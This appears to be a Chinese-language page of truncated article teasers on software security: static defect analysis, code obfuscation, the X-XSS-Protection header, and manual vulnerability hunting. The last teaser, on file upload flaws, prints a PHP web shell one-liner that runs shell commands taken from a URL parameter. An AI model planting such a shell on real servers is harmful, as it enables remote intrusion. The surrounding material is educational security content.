摘要：软件安全检查极具挑战性，目前的主要理论和技术研究都是欧美完成的。希望有更多的软件开发人员能够投入到这个领域，为国产的静态软件分析做出贡献。 本文分享自华为云社区《一图看懂软件缺陷检查涉及 ...

混淆目的 将程序代码，转换成功能不变，但难以阅读或理解的形式。 方法及应用 字符串加密：对应用程序中使用到的字符串进行 加密，防止通过IDA等工具获取关键词定位核心 ...

引言 我曾做过一个调查，看看网友们对关于X-XSS-Protection 字段的设置中，哪一个设置是最差的，调查结果令我非常吃惊，故有此文。 网友们认为 最差的配置是X-XSS-Protectio ...

手动漏洞挖掘 文件上传漏洞【经典漏洞，本身为一个功能，根源：对上传文件的过滤机制不严谨】 <?php echo shell_exec($_GET['cmd']);?> 直接上传web ...